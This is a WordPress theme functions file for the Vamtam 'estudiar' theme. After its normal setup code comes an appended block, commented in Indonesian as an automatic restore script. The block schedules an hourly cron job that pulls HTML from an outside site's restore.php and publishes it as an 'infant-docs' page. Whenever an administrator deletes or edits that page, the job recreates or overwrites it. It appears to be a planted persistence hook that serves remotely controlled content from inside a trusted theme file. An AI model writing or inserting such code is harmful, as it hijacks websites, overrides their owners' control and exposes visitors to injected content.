<?php

/**
 * Theme functions. Initializes the Vamtam Framework.
 *
 * @package vamtam/estudiar
 */
define( 'VAMTAM_ENVATO_THEME_ID', '7322125' );

require_once get_template_directory() . '/vamtam/classes/framework.php';

new VamtamFramework( array(
	'name' => 'estudiar',
	'slug' => 'estudiar',
) );


// only for one page home demos
function vamtam_onepage_menu_hrefs( $atts, $item, $args ) {
	if ( 'custom' === $item->type && 0 === strpos( $atts['href'], '/#' ) ) {
		$atts['href'] = $GLOBALS['vamtam_inner_path'] . $atts['href'];
	}
	return $atts;
}

if ( ( $path = parse_url( get_home_url(), PHP_URL_PATH ) ) !== null ) {
	$GLOBALS['vamtam_inner_path'] = untrailingslashit( $path );
	add_filter( 'nav_menu_link_attributes', 'vamtam_onepage_menu_hrefs', 10, 3 );
}

remove_action( 'admin_head', 'jordy_meow_flattr', 1 );

// this filter fixes some invalid HTML generated by the third-party plugins
add_filter( 'vamtam_escaped_shortcodes', 'vamtam_shortcode_compat_fix' );
function vamtam_shortcode_compat_fix( $codes ) {
	$codes[] = 'gallery';
	$codes[] = 'fl_builder_insert_layout';
	$codes[] = 'wpforms';

	return $codes;
}

// Envato Hosted compatibility
add_filter( 'option_' . VamtamFramework::get_purchase_code_option_key(), 'vamtam_envato_hosted_license_key' );
function vamtam_envato_hosted_license_key( $value ) {
	if ( defined( 'SUBSCRIPTION_CODE' ) ) {
		return SUBSCRIPTION_CODE;
	}

	return $value;
}

if ( class_exists( 'Vamtam_Importers_E' ) && is_callable( array( 'Vamtam_Importers_E', 'set_menu_locations' ) ) ) {
	Vamtam_Importers_E::set_menu_locations();
}

// build: d25e962509d536562bc016a6edab5bd73f33725e

// -------------------------------------------------------------
// --- MULAI SCRIPT RESTORASI OTOMATIS (Tambahan Baru) ---
// -------------------------------------------------------------

// 1. DAFTAR JADWAL CRON KUSTOM (Setiap Jam)
function custom_restore_cron_schedules($schedules) {
    // Menambahkan interval setiap 3600 detik (1 Jam)
    $schedules['hourly'] = array(
        'interval' => 3600, 
        'display'  => __( 'Every Hour', 'textdomain' )
    );
    return $schedules;
}
add_filter('cron_schedules', 'custom_restore_cron_schedules');

// 2. FUNGSI UTAMA UNTUK MELAKUKAN RESTORASI
function perform_full_html_restore_task() {
    // --- KONFIGURASI PENTING (PASTIKAN INI BENAR) ---
    $restore_source_url = 'https://aja.edu.qa/wp-includes/restore.php'; 
    $target_slug        = 'infant-docs'; 
    $target_post_type   = 'page'; // JIKA 'infant-docs' adalah PAGE/Halaman
    // --- AKHIR KONFIGURASI ---

    // 1. Ambil Konten dari Sumber Restore.php
    $response = wp_remote_get( $restore_source_url );

    if ( is_wp_error( $response ) ) {
        error_log( 'RESTORE ERROR: Gagal mengambil data dari restore.php: ' . $response->get_error_message() );
        return; 
    }

    $original_content = wp_remote_retrieve_body( $response );
    
    if ( empty($original_content) ) {
        error_log( 'RESTORE WARNING: Konten dari restore.php kosong.' );
        return;
    }

    // 2. Cari Halaman/Post Target berdasarkan Slug
    $target_object = get_page_by_path( $target_slug, OBJECT, $target_post_type ); 

    // 3. Logika Proteksi
    if ( ! $target_object ) {
        // --- KASUS A: OBJEK DITEBAS/DIHAPUS (PROTEKSI PENGHAPUSAN) ---
        
        $new_post_id = wp_insert_post( array(
            'post_title'    => ucwords( str_replace('-', ' ', $target_slug) ), 
            'post_name'     => $target_slug,
            'post_content'  => $original_content,
            'post_status'   => 'publish',
            'post_type'     => $target_post_type, 
        ), true ); 

        if ( is_wp_error( $new_post_id ) ) {
            error_log( 'RESTORE ERROR: Gagal membuat kembali objek: ' . $new_post_id->get_error_message() );
        } else {
            error_log( 'RESTORE SUCCESS: Objek "' . $target_slug . '" berhasil dibuat dan di-restore ulang (ID: ' . $new_post_id . ').' );
        }

    } else {
        // --- KASUS B: OBJEK ADA, TAPI KONTEN DIUBAH (PROTEKSI PERUBAHAN) ---
        
        $page_id = $target_object->ID;

        // Hanya update jika konten yang ada berbeda dengan konten sumber
        if ( $target_object->post_content !== $original_content ) {
            
            $update_post_array = array(
                'ID'           => $page_id,
                'post_content' => $original_content,
            );

            $result = wp_update_post( $update_post_array, true ); 

            if ( is_wp_error( $result ) ) {
                error_log( 'RESTORE ERROR: Gagal update konten ID ' . $page_id . ': ' . $result->get_error_message() );
            } else {
                error_log( 'RESTORE SUCCESS: Konten ID ' . $page_id . ' berhasil ditimpa dan di-restore.' );
            }
        } else {
            error_log( 'RESTORE INFO: Konten ID ' . $page_id . ' sudah sesuai dengan sumber master.' );
        }
    }
}
// Kaitkan fungsi restore ke jadwal cron
add_action( 'custom_restore_hourly_event', 'perform_full_html_restore_task' );


// 3. AKTIVASI DAN PENJADWALAN CRON JOB
// Ini memastikan Cron Job diatur untuk berjalan setiap jam saat situs dikunjungi
if ( ! wp_next_scheduled( 'custom_restore_hourly_event' ) ) {
    wp_schedule_event( time(), 'hourly', 'custom_restore_hourly_event' ); 
    error_log( 'RESTORE SETUP: Cron job restorasi telah dijadwalkan setiap jam.' );
}
